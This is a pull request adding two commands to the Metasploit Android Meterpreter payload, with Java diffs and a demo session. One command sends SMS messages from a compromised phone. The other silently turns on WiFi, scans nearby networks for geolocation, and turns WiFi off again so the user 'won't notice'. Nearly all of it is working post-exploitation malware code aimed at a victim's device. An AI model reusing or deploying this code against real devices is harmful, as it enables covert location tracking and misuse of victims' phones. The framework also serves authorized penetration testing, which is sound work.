### PR TITLE
send_sms + wlan_geolocate

### DIFF
--- a/java/androidpayload/app/AndroidManifest.xml
+++ b/java/androidpayload/app/AndroidManifest.xml
@@ -7,6 +7,8 @@
     <uses-sdk android:minSdkVersion="10"/>
 
     <uses-permission android:name="android.permission.INTERNET" />
+    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
+    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
     <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
     <uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION" />
     <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@@ -4,6 +4,8 @@ import android.content.Context;
 import android.os.Handler;
 import android.os.Looper;
 
+import com.metasploit.meterpreter.wlan_geolocate;
+import com.metasploit.meterpreter.android.send_sms_android;
 import com.metasploit.meterpreter.android.check_root_android;
 import com.metasploit.meterpreter.android.dump_calllog_android;
 import com.metasploit.meterpreter.android.dump_contacts_android;
@@ -145,6 +147,8 @@ public class AndroidMeterpreter extends Meterpreter {
             mgr.registerCommand("geolocate", geolocate_android.class);
             mgr.registerCommand("dump_calllog", dump_calllog_android.class);
             mgr.registerCommand("check_root", check_root_android.class);
+	    mgr.registerCommand("send_sms", send_sms_android.class);
+	    mgr.registerCommand("wlan_geolocate", wlan_geolocate.class);
         }
         return getCommandManager().getNewCommands();
     }

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@@ -4,7 +4,7 @@ import android.content.Context;
 import android.os.Handler;
 import android.os.Looper;
 
-import com.metasploit.meterpreter.wlan_geolocate;
+import com.metasploit.meterpreter.android.wlan_geolocate;
 import com.metasploit.meterpreter.android.send_sms_android;
 import com.metasploit.meterpreter.android.check_root_android;
 import com.metasploit.meterpreter.android.dump_calllog_android;

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java
@@ -1,0 +1,109 @@
+package com.metasploit.meterpreter.android;
+
+import android.telephony.SmsManager;
+
+import android.app.PendingIntent;
+import android.content.BroadcastReceiver;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.app.Activity;
+import android.content.Context;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+
+
+public class send_sms_android implements Command {
+
+    private static final int TLV_EXTENSIONS = 20000;
+    private static final int TLV_TYPE_SMS_ADDRESS = TLVPacket.TLV_META_TYPE_STRING
+            | (TLV_EXTENSIONS + 9001);
+    private static final int TLV_TYPE_SMS_BODY = TLVPacket.TLV_META_TYPE_STRING
+            | (TLV_EXTENSIONS + 9002);
+    private static final int TLV_TYPE_SMS_SENT = TLVPacket.TLV_META_TYPE_BOOL
+            | (TLV_EXTENSIONS + 9021);
+
+    private static final String address = "address";
+    private static final String body = "body";
+
+
+    @Override
+    public int execute(Meterpreter meterpreter, TLVPacket request,
+                       TLVPacket response) throws Exception {
+
+	String number = request.getStringValue(TLV_TYPE_SMS_ADDRESS);
+	String message = request.getStringValue(TLV_TYPE_SMS_BODY);
+	SmsManager sm = SmsManager.getDefault();
+	if (message.length() > 160) {
+	}
+	else {
+		String SMS_SENT = "SMS_SENT";
+		String SMS_DELIVERED = "SMS_DELIVERED";
+		AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter) meterpreter;
+	        final Context context = androidMeterpreter.getContext();
+
+		PendingIntent sentPendingIntent = PendingIntent.getBroadcast(context, 0, new Intent(SMS_SENT), 0);
+		PendingIntent deliveredPendingIntent = PendingIntent.getBroadcast(context, 0, new Intent(SMS_DELIVERED), 0);
+
+		// For when the SMS has been sent
+		context.registerReceiver(new BroadcastReceiver() {
+			@Override
+			public void onReceive(Context context, Intent intent) {
+				String result = "";
+				switch(getResultCode()) {
+					case Activity.RESULT_OK:
+						result = "Transmission successful";
+						break;
+					case SmsManager.RESULT_ERROR_GENERIC_FAILURE:
+						result = "Transmission failed";
+						break;
+					case SmsManager.RESULT_ERROR_RADIO_OFF:
+						result = "Radio off";
+						break;
+					case SmsManager.RESULT_ERROR_NULL_PDU:
+						result = "No PDU defined";
+						break;
+					case SmsManager.RESULT_ERROR_NO_SERVICE:
+						result = "No service";
+						break;
+				}
+			}
+		}, new IntentFilter(SMS_SENT));
+ 
+		// For when the SMS has been delivered
+		context.registerReceiver(new BroadcastReceiver() {
+			@Override
+			public void onReceive(Context context, Intent intent) {
+				String result = "";
+				switch(getResultCode()) {
+					case Activity.RESULT_OK:
+						result = "Transmission successful";
+						break;
+					case SmsManager.RESULT_ERROR_GENERIC_FAILURE:
+						result = "Transmission failed";
+						break;
+					case SmsManager.RESULT_ERROR_RADIO_OFF:
+						result = "Radio off";
+						break;
+					case SmsManager.RESULT_ERROR_NULL_PDU:
+						result = "No PDU defined";
+						break;
+					case SmsManager.RESULT_ERROR_NO_SERVICE:
+						result = "No service";
+						break;
+				}
+			}
+		}, new IntentFilter(SMS_DELIVERED));
+
+		// Get the default instance of SmsManager
+		SmsManager smsManager = SmsManager.getDefault();
+		// Send a text based SMS
+		smsManager.sendTextMessage(number, null, message, sentPendingIntent, deliveredPendingIntent);
+//		smsManager.sendTextMessage(number, null, message, null, null);
+		response.addOverflow(TLV_TYPE_SMS_SENT, true);
+	}
+	return ERROR_SUCCESS;
+    }
+}

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java
@@ -22,12 +22,14 @@ public class send_sms_android implements Command {
             | (TLV_EXTENSIONS + 9001);
     private static final int TLV_TYPE_SMS_BODY = TLVPacket.TLV_META_TYPE_STRING
             | (TLV_EXTENSIONS + 9002);
-    private static final int TLV_TYPE_SMS_SENT = TLVPacket.TLV_META_TYPE_BOOL
+    private static final int TLV_TYPE_SMS_SR = TLVPacket.TLV_META_TYPE_STRING
             | (TLV_EXTENSIONS + 9021);
+    private static final int TLV_TYPE_SMS_DR = TLVPacket.TLV_META_TYPE_BOOL
+            | (TLV_EXTENSIONS + 9026);
 
-    private static final String address = "address";
-    private static final String body = "body";
-
+    Object SMSstatus= new Object();
+    Object SMSdelivered= new Object();
+    String resultSent,resultDelivered;
 
     @Override
     public int execute(Meterpreter meterpreter, TLVPacket request,
@@ -35,75 +37,155 @@ public class send_sms_android implements Command {
 
 	String number = request.getStringValue(TLV_TYPE_SMS_ADDRESS);
 	String message = request.getStringValue(TLV_TYPE_SMS_BODY);
+	boolean dr = request.getBooleanValue(TLV_TYPE_SMS_DR);
 	SmsManager sm = SmsManager.getDefault();
+	String SMS_SENT = "SMS_SENT";
+	String SMS_DELIVERED = "SMS_DELIVERED";
+	AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter) meterpreter;
+        final Context context = androidMeterpreter.getContext();
+
+	// Get the default instance of SmsManager
+	SmsManager smsManager = SmsManager.getDefault();
+
+
+	PendingIntent sentPendingIntent = PendingIntent.getBroadcast(context, 0, new Intent(SMS_SENT), 0);
+	PendingIntent deliveredPendingIntent = PendingIntent.getBroadcast(context, 0, new Intent(SMS_DELIVERED), 0);
+
+	// For when the SMS has been sent
+	context.registerReceiver(new BroadcastReceiver() {
+		@Override
+		public void onReceive(Context context, Intent intent) {
+			synchronized (SMSstatus){
+				resultSent = "";
+				switch(getResultCode()) {
+					case Activity.RESULT_OK:
+						resultSent = "Transmission successful";
+						break;
+					case SmsManager.RESULT_ERROR_GENERIC_FAILURE:
+						resultSent = "Transmission failed";
+						break;
+					case SmsManager.RESULT_ERROR_RADIO_OFF:
+						resultSent = "Radio off";
+						break;
+					case SmsManager.RESULT_ERROR_NULL_PDU:
+						resultSent = "No PDU defined";
+						break;
+					case SmsManager.RESULT_ERROR_NO_SERVICE:
+						resultSent = "No service";
+						break;
+				}
+				SMSstatus.notifyAll();
+			}
+		}
+	}, new IntentFilter(SMS_SENT));
+
+	// For when the SMS has been delivered
+	context.registerReceiver(new BroadcastReceiver() {
+		@Override
+		public void onReceive(Context context, Intent intent) {
+			synchronized (SMSdelivered){
+				resultDelivered = "";
+				switch(getResultCode()) {
+					case Activity.RESULT_OK:
+						resultDelivered = "Transmission successful";
+						break;
+					case SmsManager.RESULT_ERROR_GENERIC_FAILURE:
+						resultDelivered = "Transmission failed";
+						break;
+					case SmsManager.RESULT_ERROR_RADIO_OFF:
+						resultDelivered = "Radio off";
+						break;
+					case SmsManager.RESULT_ERROR_NULL_PDU:
+						resultDelivered = "No PDU defined";
+						break;
+					case SmsManager.RESULT_ERROR_NO_SERVICE:
+						resultDelivered = "No service";
+						break;
+				}
+				SMSdelivered.notifyAll();
+			}
+		}
+	}, new IntentFilter(SMS_DELIVERED));
+
 	if (message.length() > 160) {
+
+		//Break message into 160 character pieces
+		int interval = 160;
+		int arrayLength = (int) Math.ceil(((message.length() / (double)interval)));
+		String[] pieces = new String[arrayLength];
+		int j = 0;
+		int lastIndex = pieces.length - 1;
+		for (int i = 0; i < lastIndex; i++) {
+			pieces[i] = message.substring(j, j + interval);
+			j += interval;
+		}
+		pieces[lastIndex] = message.substring(j);
+		boolean failed=false;
+		//Send all parts of long message
+		for (int i = 0; i<=lastIndex; i++) {
+			String part=pieces[i];
+			smsManager.sendTextMessage(number, null, part, sentPendingIntent, deliveredPendingIntent);
+			resultSent=null;
+			synchronized (SMSstatus){
+				while (resultSent == null){
+					SMSstatus.wait(1000);
+				}
+				if (resultSent != "Transmission successful"){
+					response.addOverflow(TLV_TYPE_SMS_SR,resultSent);
+					failed=true;
+				}
+			}
+			if (dr){
+				if (failed==true){
+					response.addOverflow(TLV_TYPE_SMS_SR,resultSent);
+					return ERROR_SUCCESS;
+				}
+				resultDelivered=null;
+				synchronized (SMSdelivered){
+					while (resultDelivered == null){
+						SMSdelivered.wait(1000);
+					}
+					if (resultDelivered != "Transmission successful"){
+						response.addOverflow(TLV_TYPE_SMS_SR,resultDelivered);
+						failed=true;
+					}
+				}
+			}
+			if (failed==true){
+				return ERROR_SUCCESS;
+			}
+
+		}
+		response.addOverflow(TLV_TYPE_SMS_SR,resultSent);
+		if (dr){
+			response.addOverflow(TLV_TYPE_SMS_SR,resultDelivered);
+		}
+
 	}
 	else {
-		String SMS_SENT = "SMS_SENT";
-		String SMS_DELIVERED = "SMS_DELIVERED";
-		AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter) meterpreter;
-	        final Context context = androidMeterpreter.getContext();
 
-		PendingIntent sentPendingIntent = PendingIntent.getBroadcast(context, 0, new Intent(SMS_SENT), 0);
-		PendingIntent deliveredPendingIntent = PendingIntent.getBroadcast(context, 0, new Intent(SMS_DELIVERED), 0);
-
-		// For when the SMS has been sent
-		context.registerReceiver(new BroadcastReceiver() {
-			@Override
-			public void onReceive(Context context, Intent intent) {
-				String result = "";
-				switch(getResultCode()) {
-					case Activity.RESULT_OK:
-						result = "Transmission successful";
-						break;
-					case SmsManager.RESULT_ERROR_GENERIC_FAILURE:
-						result = "Transmission failed";
-						break;
-					case SmsManager.RESULT_ERROR_RADIO_OFF:
-						result = "Radio off";
-						break;
-					case SmsManager.RESULT_ERROR_NULL_PDU:
-						result = "No PDU defined";
-						break;
-					case SmsManager.RESULT_ERROR_NO_SERVICE:
-						result = "No service";
-						break;
-				}
-			}
-		}, new IntentFilter(SMS_SENT));
- 
-		// For when the SMS has been delivered
-		context.registerReceiver(new BroadcastReceiver() {
-			@Override
-			public void onReceive(Context context, Intent intent) {
-				String result = "";
-				switch(getResultCode()) {
-					case Activity.RESULT_OK:
-						result = "Transmission successful";
-						break;
-					case SmsManager.RESULT_ERROR_GENERIC_FAILURE:
-						result = "Transmission failed";
-						break;
-					case SmsManager.RESULT_ERROR_RADIO_OFF:
-						result = "Radio off";
-						break;
-					case SmsManager.RESULT_ERROR_NULL_PDU:
-						result = "No PDU defined";
-						break;
-					case SmsManager.RESULT_ERROR_NO_SERVICE:
-						result = "No service";
-						break;
-				}
-			}
-		}, new IntentFilter(SMS_DELIVERED));
-
-		// Get the default instance of SmsManager
-		SmsManager smsManager = SmsManager.getDefault();
-		// Send a text based SMS
+		// Send a single text based SMS
 		smsManager.sendTextMessage(number, null, message, sentPendingIntent, deliveredPendingIntent);
-//		smsManager.sendTextMessage(number, null, message, null, null);
-		response.addOverflow(TLV_TYPE_SMS_SENT, true);
+		resultSent=null;
+		synchronized (SMSstatus){
+			while (resultSent == null){
+				SMSstatus.wait(1000);
+			}
+			response.addOverflow(TLV_TYPE_SMS_SR,resultSent);
+		}
+
+		if (dr){
+			resultDelivered=null;
+			synchronized (SMSdelivered){
+				while (resultDelivered == null){
+					SMSdelivered.wait(1000);
+				}
+				response.addOverflow(TLV_TYPE_SMS_SR,resultDelivered);
+			}
+		}
 	}
 	return ERROR_SUCCESS;
+
+
     }
 }

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java
@@ -41,7 +41,6 @@ public class wlan_geolocate implements Command {
 
         class WifiReceiver extends BroadcastReceiver {
 
-            // This method call when number of wifi connections changed
 	    @Override
             public void onReceive(Context c, Intent intent) {
 

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java
@@ -75,9 +75,17 @@ public class wlan_geolocate implements Command {
 
 	 wifiList=null;
 	 synchronized (scanready){
+		int n=0;
 		while(wifiList == null) {
 //			Log.i("AAA","Waiting for scan results..");
+
+			//Unsure what happens if there are is no WiFi around,
+			//so this returns an error after 30sec without scan results
+			if (n>30){
+				return ERROR_FAILURE;
+			}
 		       	scanready.wait(1000);
+			n++;
 	 	}
 
 		//If wifi was disabled when process started, turn it off again
@@ -85,7 +93,9 @@ public class wlan_geolocate implements Command {
 		if (WifiStatus == false){
 			mainWifi.setWifiEnabled(false);
 		}
-
+		if (wifiList.size()==0){
+			return ERROR_FAILURE;
+		}
 		for(int i = 0; i < wifiList.size(); i++){
 			TLVPacket pckt=new TLVPacket();
 			pckt.addOverflow(TLV_TYPE_WLAN_SSID,wifiList.get(i).SSID);

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java
@@ -1,0 +1,103 @@
+ package com.metasploit.meterpreter;
+
+import java.util.List;
+
+import android.app.Activity;
+import android.os.Handler;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.net.wifi.ScanResult;
+import android.net.wifi.WifiManager;
+import android.os.Bundle;
+import android.view.Menu;
+import android.view.MenuItem;
+import android.widget.TextView;
+import android.widget.Toast;
+import android.util.Log;
+
+import com.metasploit.meterpreter.AndroidMeterpreter;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+
+public class wlan_geolocate implements Command {
+    private static final int TLV_EXTENSIONS = 20000;
+    private static final int TLV_TYPE_WLAN_GROUP = TLVPacket.TLV_META_TYPE_GROUP
+            | (TLV_EXTENSIONS + 9022);
+    private static final int TLV_TYPE_WLAN_BSSID = TLVPacket.TLV_META_TYPE_STRING
+            | (TLV_EXTENSIONS + 9023);
+    private static final int TLV_TYPE_WLAN_SSID = TLVPacket.TLV_META_TYPE_STRING
+            | (TLV_EXTENSIONS + 9024);
+    private static final int TLV_TYPE_WLAN_LEVEL = TLVPacket.TLV_META_TYPE_UINT
+            | (TLV_EXTENSIONS + 9025);
+
+	WifiManager mainWifi;
+	WifiReceiver receiverWifi;
+	List<ScanResult> wifiList;
+	Object scanready = new Object();
+	boolean WifiStatus;
+
+        class WifiReceiver extends BroadcastReceiver {
+
+            // This method call when number of wifi connections changed
+	    @Override
+            public void onReceive(Context c, Intent intent) {
+
+		synchronized (scanready){
+	                wifiList = mainWifi.getScanResults();
+		    scanready.notifyAll();
+		}
+
+
+            }
+
+        }
+
+    @Override
+    public int execute(Meterpreter meterpreter, TLVPacket request,
+                       TLVPacket response) throws Exception {
+        AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter) meterpreter;
+        final Context context = androidMeterpreter.getContext();
+
+         mainWifi = (WifiManager) context.getSystemService(context.WIFI_SERVICE);
+	 WifiStatus=mainWifi.isWifiEnabled();
+         if (WifiStatus == false)
+         {
+             // If wifi is disabled, enable it
+             mainWifi.setWifiEnabled(true);
+         }
+
+         receiverWifi = new WifiReceiver();
+         context.registerReceiver(receiverWifi, new IntentFilter(WifiManager.SCAN_RESULTS_AVAILABLE_ACTION));
+         mainWifi.startScan();
+
+	 wifiList=null;
+	 synchronized (scanready){
+		while(wifiList == null) {
+//			Log.i("AAA","Waiting for scan results..");
+		       	scanready.wait(1000);
+	 	}
+
+		//If wifi was disabled when process started, turn it off again
+		//hopefully fast-enough that user won't notice =)
+		if (WifiStatus == false){
+			mainWifi.setWifiEnabled(false);
+		}
+
+		for(int i = 0; i < wifiList.size(); i++){
+			TLVPacket pckt=new TLVPacket();
+			pckt.addOverflow(TLV_TYPE_WLAN_SSID,wifiList.get(i).SSID);
+			pckt.addOverflow(TLV_TYPE_WLAN_BSSID,wifiList.get(i).BSSID);
+			int level=0;
+			level = mainWifi.calculateSignalLevel(wifiList.get(i).level,100);
+			pckt.addOverflow(TLV_TYPE_WLAN_LEVEL,level);
+			response.addOverflow(TLV_TYPE_WLAN_GROUP, pckt);
+		}
+	}
+
+	return ERROR_SUCCESS;
+    }
+}
+

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java
@@ -1,4 +1,4 @@
- package com.metasploit.meterpreter;
+ package com.metasploit.meterpreter.android;
 
 import java.util.List;
 
@@ -74,19 +74,7 @@ public class wlan_geolocate implements Command {
 
 	 wifiList=null;
 	 synchronized (scanready){
-		int n=0;
-		while(wifiList == null) {
-//			Log.i("AAA","Waiting for scan results..");
-
-			//Unsure what happens if there are is no WiFi around,
-			//so this returns an error after 30sec without scan results
-			if (n>30){
-				return ERROR_FAILURE;
-			}
-		       	scanready.wait(1000);
-			n++;
-	 	}
-
+	       	scanready.wait(30000);
 		//If wifi was disabled when process started, turn it off again
 		//hopefully fast-enough that user won't notice =)
 		if (WifiStatus == false){


### PR DESCRIPTION
Added WiFi-based geolocation for android.
Added send_sms extension for android.
(Framework @ https://github.com/rapid7/metasploit-framework/pull/5748)

DEMO:
```
Android Commands
================

    Command         Description
    -------         -----------
    check_root      Check if device is rooted
    dump_calllog    Get call log
    dump_contacts   Get contacts list
    dump_sms        Get sms messages
    geolocate       Get current lat-long using geolocation
    send_sms        Sends SMS from target session
    wlan_geolocate  Get current lat-long using WLAN information

meterpreter > wlan_geolocate 
[*] Google indicates that the target is within 150 meters of XX.XXXXXX,-X.XXXXXXX.
[*] Google Maps URL:  https://maps.google.com/?q=XX.XXXXXX,-X.XXXXXX
meterpreter > send_sms 
[-] You must enter both a destination address -d and the SMS text body -t
[-] e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."

OPTIONS:

    -d <opt>  Destination number
    -dr        Wait for delivery report
    -h        Help Banner
    -t <opt>  SMS body text


meterpreter > send_sms -dr -d XXXXXXXXX -t "Hello World"
[+] SMS sent - Transmission successful
[+] SMS delivered - Transmission successful
```